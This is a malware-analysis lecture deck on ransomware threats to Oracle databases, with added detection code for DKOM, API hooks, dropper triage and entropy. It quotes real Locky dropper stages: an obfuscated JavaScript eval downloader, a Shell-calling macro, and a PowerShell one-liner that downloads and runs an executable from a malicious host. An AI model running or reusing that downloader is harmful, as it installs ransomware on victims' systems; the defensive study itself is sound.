Chronicles of Malwares and Detection Systems_SecurityXploded_Meet_june14
ALEXANDRE BORGES – IT IS NOT ALLOWED TO COPY NEITHER REPRODUCE THIS SLIDE.
GUOB TECH DAY 2017 – LA OTN TOUR
(INTRODUCTORY LECTURE FOR DBAs)
By Alexandre Borges
MALWARES ON WINDOWS AND LINUX: THE WORST THREAT FOR DATABASES
PROFILE AND TOC
TOC:
• Introduction
• Infection
• Test Environment
• Memory Analysis
• Quick Dynamic and Static Analysis
• Last words
PROFILE:
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-instructor at Symantec.
• Member of the CHFI Advisory Board at EC-Council.
• Reviewer for The Journal of Digital Forensics, Security and Law.
• Referee for Digital Investigation: The International Journal of Digital Forensics & Incident Response.
• Author of the book “Oracle Solaris Advanced Administration”.
WARNING !!!
• Please pay attention to the following considerations:
• It is NOT ALLOWED to take pictures of the slides.
• It is NOT ALLOWED to record the lecture.
• It is NOT ALLOWED to film the lecture.
• Please respect the speaker and his material.
HTTP://ALEXANDREBORGES.ORG 3
INTRODUCTION
• FACT: malware is destroying the digital world.
• Several types of malware, by the privilege level they run at:
• Ring 3 (user mode; ransomware included)
• Ring 0 (kernel rootkits and bootkits)
• Ring -1 (VMM / hypervisor rootkits)
• Ring -2 (SMM, System Management Mode)
• Ring -3 ? (Intel Management Engine)
• The number of malware samples infecting BIOS / UEFI firmware has been increasing.
• Malware running on the GPU
INTRODUCTION
• Malware uses several tricks to make detection harder than usual:
• Process hiding (DKOM)
• Process replacement (hollowing)
• DLL hiding (by unlinking the module's _LDR_DATA_TABLE_ENTRY from the PEB loader lists)
• Service hiding + service hijacking
• Hidden sockets
• Code injection (multiple methods)
• Hooking (inline code, IAT, EAT)
• Binary hidden in the Registry
INTRODUCTION
[Figure: process objects 101, 102 and 103 chained through their flink/blink pointers in the kernel's doubly-linked process list.]
DKOM (Direct Kernel Object Manipulation) on the process list: the rootkit rewrites the flink of the previous entry and the blink of the next entry so that both skip the victim (for example 102). Anything that walks the list from PsActiveProcessHead, including Task Manager, no longer sees the process, while its threads keep running because the scheduler does not use this list.
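An added example, not code from the slides, that simulates the trick above and the cross-view check that comparing Volatility's pslist and psscan output performs: a doubly-linked list of process objects, the DKOM unlink of one entry, and the difference between walking the list and scanning the pool of objects. The process objects (pids 101, 102 and 103, as in the figure) and the pool are constructed in user mode; only the pointer arithmetic is the same as in the kernel.

```python
"""DKOM process hiding and cross-view detection (added example, simulated in user mode)."""

class Process:
    """Stand-in for an EPROCESS: the pid plus the ActiveProcessLinks flink/blink pair."""
    def __init__(self, pid, name):
        self.pid, self.name = pid, name
        self.flink = self.blink = self

class ProcessList:
    """Stand-in for PsActiveProcessHead (the list) and the kernel pool (every object that exists)."""
    def __init__(self):
        self.head = Process(0, "<head>")
        self.pool = []

    def insert(self, proc):
        tail = self.head.blink
        proc.flink, proc.blink = self.head, tail
        tail.flink = proc
        self.head.blink = proc
        self.pool.append(proc)
        return proc

def dkom_unlink(proc):
    """The rootkit's move: point the neighbours at each other, then make the victim
    point at itself so the kernel's own unlink on process exit does not crash."""
    proc.blink.flink = proc.flink
    proc.flink.blink = proc.blink
    proc.flink = proc.blink = proc

def walk_list(plist):
    """pslist view: follow flink from the head (what Task Manager and pslist see)."""
    pids, cur = [], plist.head.flink
    while cur is not plist.head:
        pids.append(cur.pid)
        cur = cur.flink
    return pids

def scan_pool(plist):
    """psscan view: carve every process object still present in the pool, linked or not."""
    return [p.pid for p in plist.pool]

def list_consistent(plist):
    """Pointer-integrity check: for every linked entry, flink.blink must point back to it.
    A careful DKOM unlink leaves this check satisfied, which is why it is not enough."""
    cur = plist.head
    while True:
        if cur.flink.blink is not cur:
            return False
        cur = cur.flink
        if cur is plist.head:
            return True

def hidden_processes(plist):
    """Cross-view diff: objects seen by the pool scan but missing from the list walk."""
    return sorted(set(scan_pool(plist)) - set(walk_list(plist)))

def demo():
    """Three processes as in the figure; 102 is unlinked. Returns (before, after, hidden)."""
    plist = ProcessList()
    procs = {pid: plist.insert(Process(pid, f"proc{pid}")) for pid in (101, 102, 103)}
    before = walk_list(plist)
    dkom_unlink(procs[102])
    return before, walk_list(plist), hidden_processes(plist)

if __name__ == "__main__":
    print(demo())
```

After the unlink the list is still perfectly consistent, so a pointer-integrity check alone says nothing; only the cross-view difference between the list walk and the pool scan exposes the hidden process.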
INTRODUCTION
Caller:
        .....
        push param3
        push param2
        push param1
        call good_function
        mov ebx, eax
        ....

good_function (after the hook is installed):
        push ebp
        mov ebp, esp
        ...good things...
        call bad_function        ; detour inserted by the hook
        ....
        ret

bad_function:
        push ebp
        mov ebp, esp
        ...bad things...
        ret

Basic function hooking: the patched good_function detours into bad_function and then returns normally, so the caller never notices.
INTRODUCTION
• NtClose (ntdll.dll, 32-bit) after being hooked. A clean stub loads the address of SharedUserData!SystemCallStub (0x7ffe0300) into EDX and does CALL [EDX]; here EDX is pointed at 0x7c900050, a spot inside ntdll's own image, and called directly:
0x7c90cfd0 b819000000 MOV EAX, 0x19
0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050
0x7c90cfda ffd2 CALL EDX
0x7c90cfdc c20400 RET 0x4
0x7c90cfdf 90 NOP
0x7c90cfe0 b81a000000 MOV EAX, 0x1a
0x7c90cfe5 ba DB 0xba
0x7c90cfe6 0003 ADD [EBX], AL
Hooking
INTRODUCTION
0x7c900050 b203 MOV DL, 0x3
0x7c900052 eb08 JMP 0x7c90005c
0x7c900054 b204 MOV DL, 0x4
0x7c900056 eb04 JMP 0x7c90005c
0x7c900058 b205 MOV DL, 0x5
0x7c90005a eb00 JMP 0x7c90005c
0x7c90005c 52 PUSH EDX
0x7c90005d e804000000 CALL 0x7c900066
0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL
0x7c90006a 6e OUTS DX, BYTE [ESI]
.....
Hooking: anti-disassembly trick. The three MOV DL, n / JMP pairs are a dispatcher: each hooked API enters at a different MOV DL, n and jumps to the common tail at 0x7c90005c, which pushes EDX (the hook index) and CALLs 0x7c900066. The four bytes right after the CALL (f2 00 94 00) are not code but a pointer (0x009400f2 little-endian, outside ntdll); decoding the following bytes by hand gives 5a (POP EDX: the return address, which points at that 4-byte word) and ff 22 (JMP [EDX]), i.e. an indirect jump to the address stored there. A linear-sweep disassembler, as shown above, keeps decoding from 0x7c900062 and turns the data plus the real instructions into the nonsense ADD [EAX+EAX+0x6922ff5a], DL and OUTS DX, BYTE [ESI].
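The hooked NtClose stub above can be recognised mechanically: the only things that vary between a clean 32-bit ntdll stub and this one are the value loaded into EDX and whether the call is indirect. The following Python is an added example, not tooling from the slides. The hooked bytes are the ones listed above; the clean stub is constructed on the assumption that the original looks like the XP SP2/SP3 stub (MOV EAX, n; MOV EDX, 0x7ffe0300; CALL [EDX]; RET 4), the ntdll address range is assumed, and the JMP-patched sample is a constructed Detours-style overwrite.

```python
"""Checking a 32-bit ntdll system-call stub for an inline hook (added example)."""
import struct

SYSCALL_STUB_PTR = 0x7FFE0300            # SharedUserData!SystemCallStub: what a clean stub calls through
NTDLL_RANGE = (0x7C900000, 0x7C9B0000)   # assumed image range of ntdll.dll on 32-bit Windows XP

# Bytes taken from the hooked NtClose listing above.
HOOKED_NTCLOSE = bytes.fromhex("b8 19 00 00 00  ba 50 00 90 7c  ff d2  c2 04 00  90")
# Constructed clean stub for comparison (assumed XP SP2/SP3 shape): same syscall number,
# but EDX holds the SharedUserData pointer and the call is indirect.
CLEAN_NTCLOSE = bytes.fromhex("b8 19 00 00 00  ba 00 03 fe 7f  ff 12  c2 04 00  90")
# Constructed Detours-style hook: the first five bytes replaced by a relative JMP.
JMP_PATCHED = bytes.fromhex("e9 2b 10 6f 83  ba 00 03 fe 7f  ff 12  c2 04 00  90")

def parse_stub(code: bytes):
    """Decode  mov eax, imm32 ; mov edx, imm32 ; call [edx] | call edx ; ret imm16."""
    if len(code) < 15 or code[0] != 0xB8 or code[5] != 0xBA:
        return None
    syscall_no = struct.unpack_from("<I", code, 1)[0]
    edx = struct.unpack_from("<I", code, 6)[0]
    call = {b"\xff\x12": "call [edx]", b"\xff\xd2": "call edx"}.get(code[10:12])
    if call is None or code[12] != 0xC2:
        return None
    ret_imm = struct.unpack_from("<H", code, 13)[0]
    return {"syscall": syscall_no, "edx": edx, "call": call, "ret": ret_imm}

def is_hooked(code: bytes):
    """Return (hooked?, reason) for one stub."""
    d = parse_stub(code)
    if d is None:
        return True, "stub shape not recognised: prologue overwritten (JMP/INT3 patch?)"
    if d["call"] == "call [edx]" and d["edx"] == SYSCALL_STUB_PTR:
        return False, "clean: indirect call through SharedUserData"
    lo, hi = NTDLL_RANGE
    where = "inside ntdll" if lo <= d["edx"] < hi else "outside ntdll"
    return True, f"{d['call']} to {d['edx']:#010x} ({where}) instead of call [0x7ffe0300]"

def scan(stubs):
    """Run over a set of named stubs and return the names flagged as hooked."""
    return [name for name, code in stubs.items() if is_hooked(code)[0]]

if __name__ == "__main__":
    for name, code in {"NtClose (hooked)": HOOKED_NTCLOSE, "NtClose (clean)": CLEAN_NTCLOSE,
                       "NtClose (jmp patch)": JMP_PATCHED}.items():
        print(name, is_hooked(code))
```

Run against a memory dump, the same check is applied to every Nt* export of ntdll; the reason string tells the analyst whether the detour lands inside the ntdll image (as here, where the hook reused the unused first page of ntdll) or in a foreign module.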
INTRODUCTION
• And what about injection techniques? There are many methods:
• Remote DLL injection: easy to detect because the DLL must exist on disk before being injected (the target is made to LoadLibrary it by path).
• PE injection: a PE image whose IAT has been resolved for the target process is written into the target's address space and forced to execute there.
• Reflective injection: similar to the previous one, but the injected code (usually a DLL) carries its own loader and manages its own initialization, so nothing touches disk.
• APC injection: malicious code is executed by queueing it as an APC (Asynchronous Procedure Call) on a thread of the target process; it runs when that thread enters an alertable wait.
INTRODUCTION
• Other tricks:
• Hooking the SSDT
• Hooking the IDT
• Orphan threads
• IRP hooking
• Hiding kernel drivers
• Bypassing KCS (Kernel Code Signing)
• Kernel callbacks
• Filter drivers
INTRODUCTION
• The analysis can be difficult because there are several anti-analysis techniques:
• Anti-debugging
• Anti-disassembly
• Anti-VM (VMware detection)
• Packers (conventional and virtualizing ones)
• Obfuscation
• .NET tricks
• PowerShell + WMI
INTRODUCTION
• There are many threats infecting firmware and boot code; they are persistent and stealthy.
• They can replace the OS boot loader, patch the kernel, and so on...
• Petya (MBR ransomware: overwrites the MBR and encrypts the MFT)
• Mebromi (BIOS rootkit)
• Gapz (bootkit that modifies the BIOS Parameter Block of the VBR)
• TDL4 (MBR bootkit)
INTRODUCTION
Source: https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
INTRODUCTION
Source: http://privacy-pc.com/articles/ransomware-chronicle.html
INTRODUCTION - KASPERSKY OVERALL STATISTICS FOR 2016
Source: https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_2016_Statistics_ENG.pdf
INTRODUCTION - SYMANTEC INTERNET SECURITY THREAT REPORT 2016
Source: https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
Huh? Are you sure that Linux systems are safe against malware?
INFECTION
• Malware has three main goals when it infects a system:
• Owning the system, to use it in future attacks
• Stealing data
• Hijacking data (ransomware)
• We know the main infection vectors:
• USB
• Network shares
• Exploiting vulnerabilities (remember WannaCry)
INFECTION
Click to die
INFECTION
Obfuscated code. However, it is trivial to solve.
INFECTION
Obfuscated code. Again, it is trivial to solve it.
INFECTION
function nomusta(prototu){return prototu.replace(/AA/g,"");}
var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
• nomusta() strips the junk "AA" pairs, so the string handed to ActiveXObject is really MSXML2.XMLHTTP, the ProgID of the XMLHttpRequest object; the literal never appears in the script as written.
• XMLHttpRequest object: represents an HTTP request (originally an XML-over-HTTP request).
• It has an open method that prepares a synchronous or asynchronous download from a specific URL; here the method (jacob[3-2]), the URL and the async flag (ghyt) are all assembled at run time.
INFECTION
• The XMLHttpRequest object also has a send method, which sends the HTTP request to the server and receives the response.
function zulum(pikue) {pikue.send( );}
zulum(fuka);
function hust(gulibator){eval(gulibator);}
hust(gusar);
• zulum() is only a wrapper around send(), and hust() is only a wrapper around eval(): whatever gusar holds (its assignment is not shown on the slide) is executed as JavaScript. The wrappers exist to keep the words "send" and "eval" away from the call sites.
INFECTION
Click to die
INFECTION
Probably the malware author wants to execute something bad on your system.
INFECTION
Sub Document_Open( )
    urgixbe = "gwefakqyrb"
    If (odbumuwgi = 811) Then
        If (osduzu = "icdyclaw") Then
            ….
            hnevo = Shell(ibovuhl, unymk)   ' the line that matters: launches the assembled command
            niwwyshomq = Empty
            tnovgistoqme = "58732" & 18
            sgukkezihh = "46106" & 81
            ...
Again, obfuscated code. Once more, it is very simple to get past it: everything around the Shell() call is noise.
INFECTION
"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/search.php','%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'""
I have not shown the deobfuscation process because it is really simple.
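The two dropper stages above (the JavaScript with its junk-stripping helper, and the PowerShell downloader one-liner launched from the macro) can be triaged statically. The following Python is an added example, not the author's tooling: the samples are constructed from the fragments on the slides (the JavaScript helpers that are not shown were left out), the indicator names and the scoring are my own, and the regular expressions assume the two obfuscation styles seen here (junk-letter stripping through replace(/X/g,""), and randomised capitalisation of abbreviated PowerShell switches).

```python
"""Static triage of the JavaScript downloader and the PowerShell one-liner (added example)."""
import re

# Constructed from the fragments on the slides; gusar and the open() arguments are not defined there.
JS_SAMPLE = r'''
function nomusta(prototu){return prototu.replace(/AA/g,"");}
var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
function zulum(pikue) {pikue.send( );}
zulum(fuka);
function hust(gulibator){eval(gulibator);}
hust(gusar);
'''

# The command line from the macro slide, joined onto one line.
PS_SAMPLE = ('CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen '
             "(new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/search.php',"
             "'%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'\"")

# function NAME(x){return x.replace(/JUNK/g,"");}  ->  (NAME, JUNK)
JUNK_STRIPPER = re.compile(
    r'function\s+(\w+)\s*\(\s*\w+\s*\)\s*\{\s*return\s+\w+\.replace\(\s*/(\w+)/g\s*,\s*""\s*\)\s*;?\s*\}')

def decode_js_strings(src: str):
    """Find the junk-stripping helper, then decode every literal passed to it."""
    m = JUNK_STRIPPER.search(src)
    if not m:
        return {}
    name, junk = m.group(1), m.group(2)
    calls = re.findall(re.escape(name) + r'\(\s*"([^"]*)"\s*\)', src)
    return {lit: lit.replace(junk, "") for lit in calls}

JS_FLAGS = {
    "activex": re.compile(r"new\s+ActiveXObject\s*\(", re.I),
    "xmlhttp": re.compile(r"XMLHTTP", re.I),
    "send": re.compile(r"\.send\s*\(", re.I),
    "eval_wrapper": re.compile(r"\beval\s*\(\s*\w+\s*\)", re.I),
}

def triage_js(src: str):
    """Decode the strings first, then match indicators against the decoded source."""
    decoded = decode_js_strings(src)
    clean = src
    for lit, plain in decoded.items():
        clean = clean.replace(lit, plain)      # so "MSXAAML2.XMLHTAATP" still hits the XMLHTTP rule
    flags = {k: bool(p.search(clean)) for k, p in JS_FLAGS.items()}
    return {"decoded": decoded, "flags": flags, "score": sum(flags.values())}

# PowerShell switches may be abbreviated to any unambiguous prefix, hence "-e\w*" and "-w\w*".
PS_FLAGS = {
    "exec_policy_bypass": re.compile(r"-e\w*\s+bypass", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "webclient_download": re.compile(r"net\.webclient\)\s*\.\s*download(file|string)", re.I),
    "launch": re.compile(r"start-process|invoke-expression|\biex\b", re.I),
}
DOWNLOAD_ARGS = re.compile(r"download(?:file|string)\(\s*'([^']+)'\s*(?:,\s*'([^']+)')?", re.I)

def triage_ps(cmdline: str):
    """Case-insensitive indicator match plus extraction of the URL and the drop path."""
    flags = {k: bool(p.search(cmdline)) for k, p in PS_FLAGS.items()}
    m = DOWNLOAD_ARGS.search(cmdline)
    url = m.group(1) if m else None
    drop = m.group(2).lower() if m and m.group(2) else None
    return {"flags": flags, "score": sum(flags.values()), "url": url, "drop_path": drop}

if __name__ == "__main__":
    print(triage_js(JS_SAMPLE))
    print(triage_ps(PS_SAMPLE))
```

The casing games defeat only exact-string signatures; once matching is case-insensitive and the junk letters are stripped, both stages are as readable as the slides say.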
TEST ENVIRONMENT
[Lab diagram: two Windows 8 x64 virtual machines, one with Oracle Database 12.2 installed and one with Oracle Instant Client 12.2 installed, reaching the Internet through NAT.]
TEST ENVIRONMENT
• LISTENER.ORA
TEST ENVIRONMENT
• TNSNAMES.ORA
TEST ENVIRONMENT
C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))
Enter password: Malware123!
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
SQL> select instance_name from v$instance;
INSTANCE_NAME
------------------------------------------------
orcl
TEST ENVIRONMENT
Infected with Locky (version of 30 July 2017)
TEST ENVIRONMENT
Encrypted database files. On Windows you are lucky: the OS enforces file sharing modes, so a file that the running database instance holds open without write sharing cannot be opened for writing by a second process, and the ransomware cannot alter it at the same time. On Linux... no luck: file locks are advisory, so nothing stops another process from overwriting an open datafile.
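An added example, not from the slides, showing the Linux side of that remark: a process holding an exclusive flock() on a "datafile" does not stop another writer, because POSIX locks are advisory and a plain write() never consults them. The script plays both roles in one process through two separate open file descriptions, which flock() treats exactly as it would two processes; the file name is a temporary file and the contents are constructed. The Windows sharing-mode behaviour cannot be reproduced here.

```python
"""Advisory locks on Linux do not stop a second writer (added example)."""
import fcntl
import os
import tempfile

ORIGINAL = b"ORACLE DATAFILE"

def probe(path: str):
    """Play the database (lock holder) and the ransomware (intruder) on one file.
    Returns (lock_visible, write_succeeded, final_content)."""
    with open(path, "wb") as f:
        f.write(ORIGINAL)
    holder = open(path, "r+b")            # the "database" keeps the datafile open...
    fcntl.flock(holder, fcntl.LOCK_EX)    # ...and holds an exclusive advisory lock on it
    try:
        intruder = open(path, "r+b")      # a second open file description, as another process would get
        try:
            fcntl.flock(intruder, fcntl.LOCK_EX | fcntl.LOCK_NB)
            lock_visible = False          # would mean the holder's lock was not effective at all
        except BlockingIOError:
            lock_visible = True           # the lock exists and refuses a cooperating taker...
        intruder.seek(0)
        intruder.write(b"ENCRYPTED!!")    # ...but a plain write does not ask for it
        intruder.close()
    finally:
        fcntl.flock(holder, fcntl.LOCK_UN)
        holder.close()
    with open(path, "rb") as f:
        content = f.read()
    return lock_visible, content != ORIGINAL, content

def demo():
    """Run probe() on a fresh temporary file and clean up."""
    fd, path = tempfile.mkstemp(prefix="datafile-")
    os.close(fd)
    try:
        return probe(path)
    finally:
        os.unlink(path)

if __name__ == "__main__":
    print(demo())
```

The intruder's own flock() attempt fails, proving the lock is really held, and its write still lands on disk. Only cooperating software (the database itself) respects the lock; a ransomware process is not cooperating software.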
TEST ENVIRONMENT
Photo from the Twitter feed of my colleague Valerie Thomas (@hacktress09), after an Oracle database was encrypted by the ransomware....
MEMORY ANALYSIS
Probably the ransomware is destroying the snapshots (Volume Shadow Copies).
MEMORY ANALYSIS
Running as administrator
MEMORY ANALYSIS
DLLs that are responsible for network/Internet access ;)
32-bit code running on x64 (under WoW64). Of course.
MEMORY ANALYSIS
Class Identifier (CLSID) registry keys. Is COM being used? Interesting Registry entries.
MEMORY ANALYSIS
A few URLs in memory.
MEMORY ANALYSIS
Locky ransomware connecting to its C2 (Command and Control server).
MEMORY ANALYSIS
Russia...again?
MEMORY ANALYSIS
VadS (a short VAD: private memory with no backing file) with RWE (PAGE_EXECUTE_READWRITE) protection. Code injection, of course. (VAD == Virtual Address Descriptor)
MEMORY ANALYSIS
Three injected code regions saved to disk. Pay attention: three different hashes.
MEMORY ANALYSIS
Interesting string references and DLLs.
MEMORY ANALYSIS
It is a hook, but this specific one is not important right now.
QUICK STATIC AND DYNAMIC ANALYSIS
It seems that our malware is the Locky ransomware, isn't it?
QUICK STATIC AND DYNAMIC ANALYSIS
Take a look at the entropy. Boring to reverse.
QUICK STATIC AND DYNAMIC ANALYSIS
High entropy.
QUICK STATIC AND DYNAMIC ANALYSIS
Encrypted overlay.
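The entropy views on the last three slides come from a PE tool; the Python below is an added example, not that tool, that computes the same thing: Shannon entropy per section plus the overlay (the bytes past the end of the last section's raw data, where this sample keeps its encrypted blob). It carries a minimal section-table parser and builds a constructed two-section PE32 whose second section and overlay are filled with deterministic pseudo-random bytes standing in for packed and encrypted data; the section names, sizes and the 7.0 bits/byte threshold are assumptions, not values from the slides.

```python
"""Per-section and overlay entropy for a PE image (added example)."""
import hashlib
import math
import struct
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); packed or encrypted data sits near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_sections(image: bytes):
    """Minimal section-table parser: returns [(name, raw_offset, raw_size), ...]."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                      # section headers follow the optional header
    out = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)   # SizeOfRawData, PointerToRawData
        out.append((name, raw_ptr, raw_size))
    return out

def triage(image: bytes, threshold: float = 7.0):
    """Entropy per section plus the overlay (bytes after the last section's raw data).
    Returns (entropies, overlay_size, names_at_or_above_threshold)."""
    entropies, end = {}, 0
    for name, ptr, size in pe_sections(image):
        entropies[name] = shannon_entropy(image[ptr:ptr + size])
        end = max(end, ptr + size)
    overlay = image[end:]
    entropies["<overlay>"] = shannon_entropy(overlay)
    flagged = [k for k, v in entropies.items() if v >= threshold]
    return entropies, len(overlay), flagged

def _stream(seed: bytes, n: int) -> bytes:
    """Deterministic pseudo-random bytes (SHA-256 chain) standing in for packed/encrypted data."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])

def build_sample() -> bytes:
    """Constructed PE32: low-entropy .text, high-entropy UPX1-style section, encrypted overlay."""
    text = (b"push ebp; mov ebp, esp; call CreateFileW; ret\n" * 200)[:8192]
    packed = _stream(b"packed section", 16384)
    overlay = _stream(b"overlay", 4096)
    opt_size, text_ptr = 224, 0x400
    packed_ptr = text_ptr + len(text)
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40))   # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    hdr += struct.pack("<H", 0x10B).ljust(opt_size, b"\0")                # PE32 optional header
    for name, vsize, va, rsize, rptr, flags in (
        (b".text", len(text), 0x1000, len(text), text_ptr, 0x60000020),
        (b"UPX1", len(packed), 0x3000, len(packed), packed_ptr, 0xE0000040),
    ):
        hdr += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, rsize, rptr, 0, 0, 0, 0, flags)
    return bytes(hdr).ljust(text_ptr, b"\0") + text + packed + overlay

if __name__ == "__main__":
    ent, overlay_size, flagged = triage(build_sample())
    for name, value in ent.items():
        print(f"{name:10s} {value:.3f}")
    print("overlay bytes:", overlay_size, "flagged:", flagged)
```

Plain x86 code and strings sit around 4 to 6 bits per byte; a section or overlay near 8 is either compressed or encrypted, which is exactly the "boring to reverse statically, unpack it dynamically" signal the following slides act on.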
QUICK STATIC AND DYNAMIC ANALYSIS
MFC (Microsoft Foundation Classes) is a collection of C++ classes commonly used in object-oriented Windows programming; it can be thought of as a wrapper around the Windows API (a "proxy" role).
No import names: MFC42.dll is imported by ordinal, so the import table shows only numbers.
QUICK STATIC AND DYNAMIC ANALYSIS
IDA Pro resolves the ordinals and shows us all the function names inside MFC42.dll, but the reversing analysis is very boring.
QUICK STATIC AND DYNAMIC ANALYSIS
There are no crypto functions among the imports.
QUICK STATIC AND DYNAMIC ANALYSIS
Classic unpacking process: loading DLLs one by one.
QUICK STATIC AND DYNAMIC ANALYSIS
These new segments come from VirtualAlloc( ) calls. Eventually one of them could be the unpacked executable that we are looking for.
QUICK STATIC AND DYNAMIC ANALYSIS
These are good signs. Therefore, we can save this dump to disk.
QUICK STATIC AND DYNAMIC ANALYSIS
The crypto functions have arisen!
QUICK STATIC AND DYNAMIC ANALYSIS
At this point your life changes (desperately looking for a backup).
QUICK STATIC AND DYNAMIC ANALYSIS
from CryptImportKey( )
from CryptCreateHash( )
QUICK STATIC AND DYNAMIC ANALYSIS
// Encryption loop as recovered from the sample, written with the real CryptoAPI signatures.
// "block" is the next chunk of the file, as on the slide; bFinal, blockLen and bufferSize are
// not shown there. The slide labels the parameter AB_IV; the CryptoAPI parameter that sets an IV is KP_IV.
CryptSetKeyParam(hOriginalKey, KP_IV, new_IV, 0);
while ((block = NextBlockEncoding()) != NULL)
{
    HCRYPTKEY hDuplicateKey;
    // The duplicate copies the key together with its current IV/chaining state, so every
    // chunk is encrypted from the same IV, independently of the chunks before it.
    CryptDuplicateKey(hOriginalKey, NULL, 0, &hDuplicateKey);
    CryptEncrypt(hDuplicateKey, 0, bFinal, 0, block, &blockLen, bufferSize);
    CryptDestroyKey(hDuplicateKey);
}
QUICK STATIC AND DYNAMIC ANALYSIS
The usual place to set up persistence.
QUICK STATIC AND DYNAMIC ANALYSIS
Looking for all the file extensions whose files will be encrypted, and this data reference is the list of all of them!
QUICK STATIC AND DYNAMIC ANALYSIS
A few of the extensions the ransomware looks for; among them, .dbf (Oracle database datafiles).
QUICK STATIC AND DYNAMIC ANALYSIS
Connects to the author's server using a username and password.
QUICK STATIC AND DYNAMIC ANALYSIS
We could use Wireshark, couldn't we?
REMEMBER
We are always in CONTROL...
THANK YOU FOR ATTENDING MY LECTURE!
LinkedIn: http://www.linkedin.com/in/aleborges
Twitter: @ale_sp_brazil
Blog: http://alexandreborges.org
E-mail: [email protected]